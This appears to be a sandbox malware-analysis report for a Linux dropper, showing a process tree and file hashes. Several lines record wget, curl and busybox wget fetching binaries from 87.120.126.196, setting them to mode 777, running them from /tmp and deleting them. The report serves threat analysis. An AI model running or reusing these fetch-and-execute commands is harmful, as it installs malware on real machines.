/bin/chmodchmod 777 aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/aht8qi13vR83cufA19JeM2QdZqklsVQxUe./aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm aht8qi13vR83cufA19JeM2QdZqklsVQxUe2⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:954
-
-
/bin/chmodchmod 777 MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq1./MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm MItI9KOLIdhu3TCAIn1gEfeasFpfzAlSq12⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:960
-
-
/bin/chmodchmod 777 Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs./Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm Sv1qrv1MHyk6DEU5VbWAuflPImbsZfVbNs2⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:966
-
-
/bin/chmodchmod 777 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/93SohCRyB65qsR9PHr0olpVOMBCDET7daz./93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm 93SohCRyB65qsR9PHr0olpVOMBCDET7daz2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:972
-
-
/bin/chmodchmod 777 i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm./i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm i6fWSFnqesiVgJXOj9MnWLnMvpAyc9jOCm2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:978
-
-
/bin/chmodchmod 777 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg./0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm 0LElIvHRZgC6IqUUBfDAU3sKTBZG3dghNg2⤵PID:981
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:982
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:984
-
-
/bin/chmodchmod 777 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO./3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm 3OJ0Gsv7wW87HQn4Ndo3EA6Tu7SmHRKOEO2⤵PID:987
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97